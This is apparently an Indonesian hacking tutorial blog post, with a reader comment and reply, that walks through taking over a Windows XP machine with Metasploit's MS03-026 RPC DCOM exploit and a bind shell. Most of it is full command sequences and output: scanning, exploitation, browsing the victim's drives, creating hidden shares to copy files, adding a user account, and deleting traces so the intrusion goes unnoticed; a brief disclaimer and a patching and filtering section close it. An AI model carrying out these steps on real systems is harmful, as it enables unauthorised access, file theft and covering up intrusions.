Bismillahirrahmaanirrahiim
–
—“4 Commands to takeover windows machine” –
-[*] Starting the Metasploit Framework…
o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8′ 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 ‘Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo’ 8 `YooP8 `YooP’ 8YooP’ 8 `YooP’ 8 8
..:..:..:…..:::..::…..::…..:8…..:..:…..::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
+ — –=[ msfconsole v2.7 [157 exploits – 76 payloads]
msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_bind
PAYLOAD -> win32_bind
msf msrpc_dcom_ms03_026(win32_bind) > set RHOST 172.16.0.5
RHOST -> 172.16.0.5
msf msrpc_dcom_ms03_026(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Sending request…
[*] Got connection from 172.16.0.3:3766 172.16.0.5:4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:WINDOWSsystem32>
Yup 4 command dalam metasploit digunakan untuk exploitasi windows machine
(dalam hitungan detik saja bukan ;p ).
Begitulah gambaran singkat nya.
Upzz tapi kurang menarik tanpa kita bahas lebih dalam 🙂
Sip ok mari kita bahas satu persatu biar lebih menarik..
-Read This article on below carefully!!-
-Perhatian & Pemberitahuan !! :
=================================-
-Artikel ini hanya ditujukan sebagai informasi & pengetahuan untuk siapa
saja yang membaca artikel ini. So pergunakan informasi ini sebaik
mungkin.jangan sampe disalahgunakan. Segala akibat dari penyalahgunaan
artikel ini merupakan tanggung jawab pelaku.
Penulis tidak bertanggungjawab atas penyalahgunaan artikel ini. –
-Dipersilahkan memperbanyak artikel ini dengan ijin ataupun tanpa izin
dari penulis dengan tujuan non profit, dengan tetap mencantumkan kredit
atas penulis.
–
—-===== Pengantar =====—-
Sebenarnya artikel ini sudah agak basi dan kurang berbobot, penulis
menyadari akan hal ini akan tetapi tidak ada salahnya penulis mencoba
share dengan sedikit modifikasi untuk pembaca sehingga semoga bermanfaat.
amien…
Note : bagi anda yang sudah merasa jago silahkan quit cepat cepat dari
artikel ini daripada buat boring :p.dan silahkan buat artikel yang jauh
lebih bagus dari ini!! 🙂
-because i am just ordinary human 🙂 | No body is perfect..-
—-===== Isi =====—-
-1. Apa dan bagaimana ?-
-Artikel ini merupakan bagaimana cara mendapatkan mesini windows
alias take over windows (xP or win2000 ) menggunakan metasploit dengan
memakai exploit msrpc_dcom_ms03_026, serta nanti kita akan bermain2
di cmd target saat kita sudah take over mesin wind* itu dengan akses
tertinggi (adminstrator, layaknya root di linux/*nix ;p).-
-Open and Explore your mind !! :)-
2. Tool and Peripheral -:
-attacker : – PC Desktop OS Windows
– nama komputer fl3xu5
– IP address 172.16.0.3
– metasploit v2.7 (http://metasploit.com)
– scanner (terserah).
target : – laptop dengan OS Windows XPSP1 :p
– nama komputer kidz
– IP address 172.16.0.5
peripheral lain
– cross cable , UnShielded Twisted Pair , dengan rj45
*yup percobaan kali ini dilakukan dengan peer to peer 😉
mumpung ada pinjeman laptop ;p
– iringan winamp with Dream theater “Strange dejavu” ;p-
-Ok langsung ajah ya biar ga kelamaan 🙂
–
3. -Mulai lakukan serangan ;p Lets Started !!-
-3.1. Scanning-
OK seperti pada umumnya yang dilakukan dalam proses hacking
adalah scanning proses :
pake nmap aja biar cepet dan praktis 🙂
G:> nmap 172.16.0.5
Starting nmap 3.48 ( http://www.insecure.org/nmap/ ) at2004-03-23 23:00WIT
Interesting ports on 172.16.0.5:
(The 1652 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
5000/tcp open UPnP-
wew ternyata port 135 nya terbuka ;p moga moga aja bisa di exploitasi
rpc nya (berdoa aja duluw ;p)
-3.2 exploitasi System via port 135 yang kebuka tadi.-
Kali ini kita pake metasploit versi2.7, bisa didwonload di situs resmi
nya http://metasploit.com. Bisa juga pake exploit lain spt KAHT2 dll.
-[*] Starting the Metasploit Framework…
o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8′ 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 ‘Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo’ 8 `YooP8 `YooP’ 8YooP’ 8 `YooP’ 8 8
..:..:..:…..:::..::…..::…..:8…..:..:…..::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
+ — –=[ msfconsole v2.7 [157 exploits – 76 payloads]
msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_bind
PAYLOAD -> win32_bind
msf msrpc_dcom_ms03_026(win32_bind) > set RHOST 172.16.0.5
RHOST -> 172.16.0.5
msf msrpc_dcom_ms03_026(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Sending request…
[*] Got connection from 172.16.0.3:3766 172.16.0.5:4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:WINDOWSsystem32> <– ok, kita berhasil masuk ke cmd target:)-
-Point penting yang perlu diperhatikan adalah
– target IP : 172.16.0.5
– IP attacker : 172.16.0.3
– port yang digunakan untuk koneksi:
port 3766 <– portnya attacker utk koneksi dng target
port 4444 netstat -a
Active Connections
Proto Local Address Foreign Address State
TCP fl3xu5:smtp fl3xu5:0 LISTENING
TCP fl3xu5:finger fl3xu5:0 LISTENING
TCP fl3xu5:http fl3xu5:0 LISTENING
TCP fl3xu5:pop3 fl3xu5:0 LISTENING
TCP fl3xu5:epmap fl3xu5:0 LISTENING
TCP fl3xu5:microsoft-ds fl3xu5:0 LISTENING
TCP fl3xu5:2869 fl3xu5:0 LISTENING
TCP fl3xu5:6017 fl3xu5:0 LISTENING
TCP fl3xu5:1028 fl3xu5:0 LISTENING
TCP fl3xu5:3306 fl3xu5:0 LISTENING
TCP fl3xu5:netbios-ssn fl3xu5:0 LISTENING
TCP fl3xu5:3766 172.16.0.5:4444 ESTABLISHED
UDP fl3xu5:microsoft-ds *:*
UDP fl3xu5:isakmp *:*
UDP fl3xu5:1025 *:*
UDP fl3xu5:1026 *:*
UDP fl3xu5:1049 *:*
UDP fl3xu5:1050 *:*
UDP fl3xu5:1051 *:*
UDP fl3xu5:1052 *:*
UDP fl3xu5:1053 *:*
UDP fl3xu5:1054 *:*
UDP fl3xu5:1055 *:*
UDP fl3xu5:1056 *:*
UDP fl3xu5:4500 *:*
UDP fl3xu5:ntp *:*
UDP fl3xu5:1900 *:*
UDP fl3xu5:ntp *:*
UDP fl3xu5:1027 *:*
UDP fl3xu5:1900 *:*
UDP fl3xu5:4293 *:*
UDP fl3xu5:ntp *:*
UDP fl3xu5:netbios-ns *:*
UDP fl3xu5:netbios-dgm *:*-
– Pada mesin target (cmd target) ketik :
C:WINDOWSsystem32>netstat -a
Active Connections
Proto Local Address Foreign Address State
TCP kidz:epmap kidz:0 LISTENING
TCP kidz:microsoft-ds kidz:0 LISTENING
TCP kidz:1025 kidz:0 LISTENING
TCP kidz:1032 kidz:0 LISTENING
TCP kidz:gds_db kidz:0 LISTENING
TCP kidz:4444 kidz:0 LISTENING
TCP kidz:5000 kidz:0 LISTENING
TCP kidz:7551 kidz:0 LISTENING
TCP kidz:netbios-ssn kidz:0 LISTENING
TCP kidz:1370 kidz:0 LISTENING
TCP kidz:1382 kidz:0 LISTENING
TCP kidz:1445 kidz:0 LISTENING
TCP kidz:1454 kidz:0 LISTENING
TCP kidz:1699 kidz:0 LISTENING
TCP kidz:1866 kidz:0 LISTENING
TCP kidz:3859 kidz:0 LISTENING
TCP kidz:4444 172.16.0.3:3766 ESTABLISHED
UDP kidz:epmap *:*
UDP kidz:microsoft-ds *:*
UDP kidz:isakmp *:*
UDP kidz:1026 *:*
UDP kidz:1027 *:*
UDP kidz:1028 *:*
UDP kidz:1581 *:*
UDP kidz:1582 *:*
UDP kidz:1583 *:*
UDP kidz:1584 *:*
UDP kidz:1585 *:*
UDP kidz:1586 *:*
UDP kidz:1587 *:*
UDP kidz:1588 *:*
UDP kidz:1589 *:*
UDP kidz:7550 *:*
UDP kidz:ntp *:*
UDP kidz:1033 *:*
UDP kidz:1900 *:*
UDP kidz:ntp *:*
UDP kidz:netbios-ns *:*
UDP kidz:netbios-dgm *:*
UDP kidz:1900 *:*-
-Coba perhatikan dari hasil netstat -a bahwa :
Proto = artinya menunjukkan protokol yang digunakan
Local Address = address lokal komputer yang bersangkutan (dalam
hal ini adalah kidz), dan port yang digunakannya.
Foreign Address = menunjukkan address asing yang sedang melakukan
koneksi.
State = menunjukkan status koneksi.
Nah coba perhatikan diatas,
TCP kidz:4444 172.16.0.3:3766 ESTABLISHED
artinya bahwa kidz (komputer target) menggunakan port 4444 untuk
terkoneksi dengan IP 172.16.0.3 (Ip attacker) dengan port attacker
adalah 3766 dimana status keduanya adalah ESTABLISHED (berhasil
terkoneksi ;-)).
Hal ini cocok dengan attacker :
TCP fl3xu5:3766 172.16.0.5:4444 ESTABLISHED
–
Coba bandingkan dengan kondisi target sebelum terexploitasi:
C:WINDOWSsystem32>netstat -a
Active Connections
Proto Local Address Foreign Address State
TCP kidz:epmap kidz:0 LISTENING
TCP kidz:microsoft-ds kidz:0 LISTENING
TCP kidz:1025 kidz:0 LISTENING
TCP kidz:1032 kidz:0 LISTENING
TCP kidz:gds_db kidz:0 LISTENING
TCP kidz:4444 kidz:0 LISTENING
TCP kidz:5000 kidz:0 LISTENING
TCP kidz:7551 kidz:0 LISTENING
TCP kidz:netbios-ssn kidz:0 LISTENING
TCP kidz:1370 kidz:0 LISTENING
TCP kidz:1382 kidz:0 LISTENING
TCP kidz:1445 kidz:0 LISTENING
TCP kidz:1454 kidz:0 LISTENING
TCP kidz:1699 kidz:0 LISTENING
TCP kidz:1866 kidz:0 LISTENING
TCP kidz:3859 kidz:0 LISTENING
UDP kidz:epmap *:*
UDP kidz:microsoft-ds *:*
UDP kidz:isakmp *:*
UDP kidz:1026 *:*
UDP kidz:1027 *:*
UDP kidz:1028 *:*
UDP kidz:1581 *:*
UDP kidz:1582 *:*
UDP kidz:1583 *:*
UDP kidz:1584 *:*
UDP kidz:1585 *:*
UDP kidz:1586 *:*
UDP kidz:1587 *:*
UDP kidz:1588 *:*
UDP kidz:1589 *:*
UDP kidz:7550 *:*
UDP kidz:ntp *:*
UDP kidz:1033 *:*
UDP kidz:1900 *:*
UDP kidz:ntp *:*
UDP kidz:netbios-ns *:*
UDP kidz:netbios-dgm *:*
UDP kidz:1900 *:*-
silahkan perbedaanya , jelas bukan 🙂
4. Explorasi lebih dalam di mesin target ;p-
C:WINDOWSsystem32>cd
cd
C:>dir /a <— tampilin isi direkory
dir /a
Volume in drive C is systemZ
Volume Serial Number is 634Q-5H3W
Directory of C:
12/06/2007 01:36 pagi $VAULT$.AVG
03/04/2003 01:57 pagi 0 AUTOEXEC.BAT
06/03/2003 04:55 sore 193 boot.ini
06/02/2003 01:57 sore 0 CONFIG.SYS
22/05/2007 05:52 sore Documents and Settings
26/06/2007 11:20 pagi 255.876.614 hiberfil.sys
18/04/2007 07:27 pagi Inprise
05/02/2003 01:57 sore 0 IO.SYS
09/05/2003 01:57 pagi 0 MSDOS.SYS
27/03/2002 04:08 sore 35.487 NTDETECT.COM
23/05/2002 08:05 sore 343.598 ntldr
28/02/2007 11:20 pagi 453.365.387 pagefile.sys
23/01/2007 03:54 sore 14.243 PDOXUSRS.NET
29/05/2007 12:22 pagi Program Files
23/03/2007 05:55 pagi RECYCLER
04/05/2003 02:02 pagi System Volume Information
22/02/2007 11:39 pagi WINDOWS
10 File(s) 564.767.298 bytes
7 Dir(s) 4.387.087.073 bytes free-
nah coba ah liat ada berapa OS nih di PC target …caranya ??
C:>type boot.ini
type boot.ini
[boot loader]
timeout=6
default=multi(0)disk(0)rdisk(0)partition(1)WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)WINDOWS=”Microsoft Windows XP Professional” /fastdetect-
wah ternyata cuma 1 oS yaitu windows…
nah ada direktory program files tuh, coba intip yuu ;p
C:>cd program files
cd program files
C:Program Files>dir /a
dir /a
Volume in drive C is systemZ
Volume Serial Number is 634Q-5H3W
Directory of C:Program Files
23/09/2007 12:22 pagi .
12/09/2007 12:22 pagi ..
21/09/2007 10:57 pagi Adobe
13/09/2007 02:46 sore BORGChat
18/09/2007 07:25 sore Borland
21/09/2007 07:21 sore Common Files
12/01/2003 01:54 pagi ComPlus Applications
13/01/2003 04:11 pagi Grisoft
08/09/2007 10:57 pagi InstallShield Installation Information
15/01/2003 01:56 pagi Internet Explorer
05/09/2007 07:26 sore JavaSoft
14/01/2003 02:38 pagi K-Lite Codec Pack
15/01/2003 01:53 pagi Messenger
04/09/2007 09:51 pagi Microsoft ActiveSync
15/01/2003 01:58 pagi microsoft frontpage
05/09/2007 09:51 pagi Microsoft Office
06/09/2007 09:51 pagi Microsoft.NET
18/09/2007 01:35 sore mIRC
22/01/2003 01:55 pagi Movie Maker
29/01/2003 01:53 pagi MSN
15/01/2003 01:53 pagi MSN Gaming Zone
19/01/2003 01:55 pagi NetMeeting
17/01/2003 01:56 pagi Online Services
15/09/2007 12:14 pagi Opera
13/01/2003 01:55 pagi Outlook Express
18/01/2003 02:03 pagi Uninstall Information
14/09/2007 08:37 sore Winamp
18/09/2007 05:53 sore Windows Media Player
14/01/2003 01:53 pagi Windows NT
04/09/2007 03:14 sore WindowsUpdate
05/09/2007 10:17 pagi WinRAR
06/09/2007 10:20 pagi XemiComputers
13/01/2003 01:58 pagi xerox
05/09/2007 11:45 sore Yahoo!
0 File(s) 0 bytes
34 Dir(s) 5.319.032.098 bytes free-
apalagi ya ?? oiya iseng buat direktory yuu ..ups tapi cepet2
dihapus ya..biar ga ketahuan 😉 segera hapus jejak 🙂
C:>mkdir test
mkdir test
C:>dir /a
Volume in drive C is systemZ
Volume Serial Number is 634Q-5H3W
Directory of C:
12/06/2007 01:36 pagi $VAULT$.AVG
03/04/2003 01:57 pagi 0 AUTOEXEC.BAT
06/03/2003 04:55 sore 193 boot.ini
06/02/2003 01:57 sore 0 CONFIG.SYS
22/05/2007 05:52 sore Documents and Settings
26/06/2007 11:20 pagi 255.876.614 hiberfil.sys
18/04/2007 07:27 pagi Inprise
05/02/2003 01:57 sore 0 IO.SYS
09/05/2003 01:57 pagi 0 MSDOS.SYS
27/03/2002 04:08 sore 35.487 NTDETECT.COM
23/05/2002 08:05 sore 343.598 ntldr
28/02/2007 11:20 pagi 453.365.387 pagefile.sys
23/01/2007 03:54 sore 14.243 PDOXUSRS.NET
29/05/2007 12:22 pagi Program Files
23/03/2007 05:55 pagi RECYCLER
04/05/2003 02:02 pagi System Volume Information
24/09/2007 01:07 sore test
22/02/2007 11:39 pagi WINDOWS
10 File(s) 564.767.298 bytes
7 Dir(s) 4.387.087.073 bytes free
asyik dah berhasil tuh membuat direktori test ;p.. nih :
24/09/2007 01:07 sore test-
buruan ah hapus, biar ga ketahuan nyusup :p
C:>rmdir test
rmdir test
C:> dir /a
dir /a
Volume in drive C is systemZ
Volume Serial Number is 634Q-5H3W
Directory of C:
12/06/2007 01:36 pagi $VAULT$.AVG
03/04/2003 01:57 pagi 0 AUTOEXEC.BAT
06/03/2003 04:55 sore 193 boot.ini
06/02/2003 01:57 sore 0 CONFIG.SYS
22/05/2007 05:52 sore Documents and Settings
26/06/2007 11:20 pagi 255.876.614 hiberfil.sys
18/04/2007 07:27 pagi Inprise
05/02/2003 01:57 sore 0 IO.SYS
09/05/2003 01:57 pagi 0 MSDOS.SYS
27/03/2002 04:08 sore 35.487 NTDETECT.COM
23/05/2002 08:05 sore 343.598 ntldr
28/02/2007 11:20 pagi 453.365.387 pagefile.sys
23/01/2007 03:54 sore 14.243 PDOXUSRS.NET
29/05/2007 12:22 pagi Program Files
23/03/2007 05:55 pagi RECYCLER
04/05/2003 02:02 pagi System Volume Information
22/02/2007 11:39 pagi WINDOWS
10 File(s) 564.767.298 bytes
7 Dir(s) 4.387.087.073 bytes free-
nah sekarang maen2 yang berhubungan dengan networking yuu
biar tambah asyik…
coba ah liat apa aja yang di share :
C:> d:
D:>net share
net share
Share name Resource Remark
—————————————————————-
IPC$ Remote IPC
D$ D: Default share
F$ F: Default share
ADMIN$ C:WINDOWS Remote Admin
C$ C: Default share
E$ E: Default share
The command completed successfully.-
nah ternyata masih default tuh share share an nya..ada IPC$,D$,
F$,ADMIN$,C$,E$.
Coba explore direktory lain ah …;p
D:>dir /a
dir /a
Volume in drive D is konami
Volume Serial Number is 2876-28BY
Directory of D:
14/03/2007 01:38 pagi System Volume Information
18/05/2007 12:23 sore funny
05/09/2007 12:31 sore Recycled
04/03/2007 07:43 sore installerzzz
05/05/2007 12:20 sore Templates
19/01/2007 04:44 sore 23 tutut.txt
05/05/2007 12:11 pagi $VAULT$.AVG
1 File(s) 23 bytes
6 Dir(s) 4.584.785.237 bytes free-
upzz ada direktory installer, kayaknya ini isi nya installer2/
software2 buat windows ya?? ga tahu juga ding, liat aja yuu :p
tapi enaknya coba di share aja biar lebih enak dan menantang ;p
D:>net share i$=d:/installerzzz
net share i$=d:/installerzzz
i$ was shared successfully.-
catatan : option $ digunakan supaya share nya di hidden biar ga
keliatan ;p
Coba liat dah berhasil di share blom yakk…
D:>net share
net share
Share name Resource Remark
—————————————————————–
IPC$ Remote IPC
D$ D: Default share
i$ d:installerzzz
F$ F: Default share
ADMIN$ C:WINDOWS Remote Admin
C$ C: Default share
E$ E: Default share
The command completed successfully.-
asyik dah berhasil di share tuh dengan share name i$ ;p
nah cepetan copi or liat2 tuh yang telah di share tadi, coz
biar ga kelamaan di share..Nah kalo dah selese, segera di unshare
ya ;p (sekali lagi kita maen bersih, be invisible ;p)
cara nya gmn dunk unshare??
D:>net share i$ /delete
net share i$ /delete
i$ was deleted successfully.-
Sip dah diunshare tuh..masa sih?? yukk kita lihat bareng:
D:>net share
net share
Share name Resource Remark
——————————————————————–
IPC$ Remote IPC
D$ D: Default share
F$ F: Default share
ADMIN$ C:WINDOWS Remote Admin
C$ C: Default share
E$ E: Default share
The command completed successfully.-
oiya sip dah di unshare…
wah enaknya liat yuu siapa aja user yang ada di PC target..
D:>net user
net user
User accounts for \
———————————————————————-
Administrator Guest HelpAssistant
kidz SUPPORT_388945a0
The command completed with one or more errors.-
nah tuh banyak user ternyata disitu, sekarang kita coba lihat
properties dari salah satu user nya,misal user administrator.
D:>net user Administrator
net user Administrator
User name Administrator
Full Name
Comment Built-in account for administering the computer/domain
User’s comment
Country code 000 (System Default)
Account active Yes <—- acount nya aktif ;p
Account expires Never
Password last set 1/1/2003 8:51 AM
Password expires Never
Password changeable 1/1/2003 8:51 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 9/20/2007 5:48 PM
Logon hours allowed All
Local Group Memberships *Administrators net user tamu 12345 /add
net user tamu tamu /add
The command completed successfully.
artinya kita menambahkan user tamu dengan password 12345
D:>net user
net user
User accounts for \
———————————————————————-
Administrator Guest HelpAssistant
kidz SUPPORT_388945a0 tamu
The command completed with one or more errors.
Sipp dah berhasil di create tuh user tamu ;p
Nah berikutnya terserah mau jadikan user tamu itu masuk ke group
administrators, terus kita pake acount tersebut buat connect back
dan seterusnya..Silahkan saaja dan kembangin sendiri ya ;p
Ok, kalo dah ga kepake kita hapus yuu user tamu itu biar ga ketahuan
kalo kita nyusup ;p
D:>net user tamu /delete
net user tamu /delete
The command completed successfully.
D:>net user
net user
User accounts for \
———————————————————————-
Administrator Guest HelpAssistant
kidz SUPPORT_388945a0
The command completed with one or more errors.
Sip dah kehapus user tamu tsb ;p
Kita explore Drive lain yuuu..masih lom cape khan ;-P hehehe
D:>f:
F:>dir /a
dir /a
Volume in drive F is high-Q
Volume Serial Number is 190T-1958
Directory of F:
19/09/2007 06:39 sore FOUND.000
09/09/2007 01:38 pagi System Volume Information
07/09/2007 12:31 sore Recycled
14/09/2007 07:50 sore film
08/09/2007 07:50 sore SongZ
0 File(s) 0 bytes
5 Dir(s) 5.067.175.298 bytes free
F:>cd SongZ
cd SongZ
F:>SongZ>dir /a
dir /a
Volume in drive F is high-Q
Volume Serial Number is 190T-1958
Directory of F:SongZ
16/03/2007 07:50 sore .
11/07/2007 07:50 sore ..
05/02/2003 06:16 pagi Indonesia
07/09/2003 06:18 pagi Barat
19/02/2007 07:51 sore Lirik Lagu
0 File(s) 0 bytes
5 Dir(s) 5.030.287.287 bytes free
Coba kita share yuuk Folder SongZ yang ada di f:, abis itu kita
mapping di PC kita ;p asyi bukan 🙂
F:SongZ>net share b$=f:SongZ
net share b$=f:SongZ
b$ was shared successfully
F:SongZ>net share
net share
Share name Resource Remark
———————————————————————–
IPC$ Remote IPC
D$ D: Default share
b$ f:SongZ
F$ F: Default share
ADMIN$ C:WINDOWS Remote Admin
C$ C: Default share
E$ E: Default share
The command completed successfully.
yup dah si share tuh f:SongZ dgn nama share nya b$.
OK berarti kita tinggal mapping aja ke PC kita, seolah olah kita
punya partisi hardisk baru. misal kita punya partisi c,d,e,f,g maka
biasa nya kalo kita telah berhasil mapping maka akan tampak partisi
Z di PC kita. untuk mapping ke dua maka akan tampak mapping point
berikutnya yaitu Y. maaping point tersebut sama seperti saat kita
melakukan “map network drive” suatu folder yang di share PC lain.
yukk langsung kita coba aja ;p
kita buka PC kita :
G:Documents and Settingsfl3xu5>net use Z: \172.16.0.5b$
The command completed successfully.
G:Documents and Settingsfl3xu5>net use
New connections will not be remembered.
Status Local Remote Network
—————————————————————–
OK Z: \172.16.0.5b$ Microsoft Windows Network
The command completed successfully.
Sip.. dah berhasil di mapping ke Z:
Silahkan cek di MY komputer kita maka akan nampak drive Z tersebut
yang berisi file sharing \172.16.0.5b$
jika sudah berhasil maka bisa kita copy file share dari PC target ;p
teknik ini digunakan untuk memudahkan kita dalam mengakses karena
kita tidak perlu mem browse PC target, melainkan kita tinggal klik
drive Z yang telah menjadi mapping point tersebut.;p
*laykanya kita mengakses drive PC kita ;p
Nah kalo dah tidak diperlukan segera “disconnect map drive” tadi,
tujuanya agar tidak di ketahui kalo kita dah nge share dan nge map
file dari PC target tersebut. (Ingat, kita maen bersih yak ;p)
caranya :
G:Documents and Settingsfl3xu5>net use Z: /delete
Z: was deleted successfully.
G:Documents and Settingsfl3xu5>net use
New connections will not be remembered
There are no entries in the list.
Nampak kalo Z: sudah tidak ada, artinya sudah tidak ada mapping
point di PC kita..
Supaya aman jangan lupa kita unshare b$ dari PC target tadi, caranya :
F:SongZ>net share b$ /delete
net share b$ /delete
b$ was deleted successfully
Cek yuu dah ter unshare blom b$ tadi :
F:SongZ>net share
net share
Share name Resource Remark
———————————————————–
IPC$ Remote IPC
D$ D: Default share
F$ F: Default share
ADMIN$ C:WINDOWS Remote Admin
C$ C: Default share
E$ E: Default share
The command completed successfully.
—-===== Analisa =====—
-Dalam kasus ini PC target merupakan PC dengan OS windows dengan default
installation artinya smuwa konfigurasi masih default, belum dilakukan
patching terhadap OS windows tersebut. Dan juga tidak dilakukan installasi
terhadapa Antivirus or firewall. Meskipun antiviurs dan firewall bukan
satu cara yang bagus untuk men secure tapi paling tidak ada beberapa
yang cocok untuk melakukan pencegahan terhadap exploit msrpcdcom ini.
—-===== Pencegahan =====—
-Salah satu pencegahan yang bisa dilakukan adalah dengan menginstall
AV dan firewall serta lakukan lah patching, sehingga mencegah
adanya intruder/attacker via port 135 tersebut dengan memanfaatkan
rpcdcom tadi.
Nah penulis coba lakukan filtering packet yang ada di TCP/IP properties
yaitu dengan
Pilih network connection –> klik kanan pada LAN –> properties–>
TCP/IP –> properties –> advanced –> options –> TCP/IP Filtering
–> properties –> Enable TCP/IP filtering –> klik permit only –>
add –> masukkan port 80 –> ok –ok –>ok –> ok.
Setelah melakukan filtering tadi, penulis coba exploitasi dengan cara
yang sama via port 135 tadi, dan hasilnya tidak berhasil terexploitasi.
padahal tanpa install AV dan firewall sebelumnya.
Akan tetapi, banyak efect yang terjadi setelah melakukan filtering tadi.
seperti tidak bisa sharing file.
berdasarkan analisa penulis, tidak berhasilnya exploitasi tadi
dikarenakan port 135 tertutup, dimana port 135 digunakan sebagai
servis yang berhubungan dengan file sharing tadi.
–===== Penutup =====—
—>> Info tambahan
— untuk informasi lebih tentang metasploit silahkan ke
http://metasploit.com, dan gunakan ? pada msf console.
– info DOS command, ketik help pada command prompt untuk mengetahui
lebih dalam command2 apa saja yang digunaakn dalam windows (DOS)
– Silahkan menganalisa lebih dalam tentang netstat, dengan ketik
netstat /? pada cmd.
Coba saya berikan sampel nya :
G:Documents and Settingsfl3xu5>net
The syntax of this command is:
NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]
G:Documents and Settingsfl3xu5>net localgroup /?
The syntax of this command is:
NET LOCALGROUP
[groupname [/COMMENT:”text”]] [/DOMAIN]
groupname {/ADD [/COMMENT:”text”] | /DELETE} [/DOMAIN]
groupname name […] {/ADD | /DELETE} [/DOMAIN]
G:Documents and Settingsfl3xu5>net share /?
The syntax of this command is:
NET SHARE
sharename
sharename=drive:path [/GRANT:user,[READ | CHANGE | FULL]]
[/USERS:number | /UNLIMITED]
[/REMARK:”text”]
[/CACHE:Manual | Documents| Programs | None ]
sharename [/USERS:number | /UNLIMITED]
[/REMARK:”text”]
[/CACHE:Manual | Documents | Programs | None]
{sharename | devicename | drive:path} /DELETE
G:Documents and Settingsfl3xu5>net start /?
The syntax of this command is:
NET START
[service]
G:Documents and Settingsfl3xu5>net stop /?
The syntax of this command is:
NET STOP
service
G:Documents and Settingsfl3xu5>net use /?
The syntax of this command is:
NET USE
[devicename | *] [\computernamesharename[volume] [password | *]]
[/USER:[domainname]username]
[/USER:[dotted domain name]username]
[/USER:[username@dotted domain name]
[/SMARTCARD]
[/SAVECRED]
[[/DELETE] | [/PERSISTENT:{YES | NO}]]
NET USE {devicename | *} [password | *] /HOME
NET USE [/PERSISTENT:{YES | NO}]
G:Documents and Settingsfl3xu5>net user /?
The syntax of this command is:
NET USER
[username [password | *] [options]] [/DOMAIN]
username {password | *} /ADD [options] [/DOMAIN]
username [/DELETE] [/DOMAIN]
G:Documents and Settingsfl3xu5>net view /?
The syntax of this command is:
NET VIEW
[\computername [/CACHE] | /DOMAIN[:domainname]]
NET VIEW /NETWORK:NW [\computername]
—>> Aware !!-
-To All, mohon diperhatikan sisi security dari windows, salah satunya
bug rpcdcom tersebut. dan bug bug lain seperti port 139 yang bisa
di exploitasi dengan lsass.. dsb
Update lah info security anda, termasuk info bug dan advisory dari
aplikasi2 yang anda pakai,lakukan patching jgn lupa ya.dsb.-
—->> Thanks Shout and Greetz To :
– ALLAH SWT dan Nabi Muhammad SAW
– My parents and my Family (thx u very much for your love..)
– all of te-28-01 erz 😉
– My 4G’erz at mobilecommlab[dot]or[dot]id (ayuu smangat!!;p)
– newhack|staff , newhack[dotorg
– all member CnC labz : arz, freak,Cyb3rh3b dkk (missed u guys ;p)
– Student’s erZ #students..oii jgn chat muluw 😉
– all of Indonesian Undergorundz Community | staff and memberz
– all of my friends
– at #newhack[dot]org #e-c-h-o, #1stlink, #antihackerlink,
#k-elektronik, #yogyafree, #xcode, #sekuritionline,
#jasakom, #unsecured and all of underground channel @DALnet
#nyubicrew @irc.mildnet.org
– k1tk4t, mR.opt1lc, Pushm0v, gh0z ,sakitjiwa, cybertank, m_beben,
matdhule, shideX, t0ngkring, th3sn0wbr4in, y3d1ps, the_day,
lirva32, ayulina, dark|ipl, digital-levi, bledhek, hzent,
tw, kopral;p, natztel, alkahfi;p, si Om, PakRT, timin,
kopasus, scriptdana, why, vindie, raiden, irving_nazmi,
Ph03n1X, primadonal, cR45H3R, aulia, sat-anichell, thesims,
adhietslank, cyberlog, letjen,dkk, boerz, bigie, camgenta,
the_rumput_kering, lppsmes, sendenk, bigmaster, kendi,dkk,
mbah scut;), the_peng and Others yang ga bisa disebut satu2..
– and all of my friends yang ga bisa di sebutin satu2 baik dalam
negeri maupun luar negeri ;)-
Reference : google.com, experiment PC peer to peer with laptop..
http://metasploit.com, ezine[at]echo.or.id.
—–===== Alhamdulillahirabbil’alamiin=====—–
-kirimkan kritik && saran ke fl3xu5[at]fl3xu5.web.id
Andaikata di C:WINDOWSsystem32driversetc>services
Port 135 dituker ke nomor port lain, masih bisa jalan enggak ya ?,
Pada Proses RPC itu, dibagian mananya kok bisa Jump ke Priveledge Admin ?
@Nemo :
Saya akan coba share berkaitan dengan pertanyaan Nemo .
[*] Starting the Metasploit Framework…
| | _) |
__ `__ _ __| _` | __| __ | _ | __|
| | | __/ | ( |__ | | | ( | | |
_| _| _|___|__|__,_|____/ .__/ _|___/ _|__|
_|
+ — –=[ msfconsole v2.7 [157 exploits – 76 payloads]
msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_bind
PAYLOAD -> win32_bind
msf msrpc_dcom_ms03_026(win32_bind) > set RHOST 172.16.0.5
RHOST -> 172.16.0.5
msf msrpc_dcom_ms03_026(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Sending request…
[*] Got connection from 172.16.0.3:3766 172.16.0.5:4444
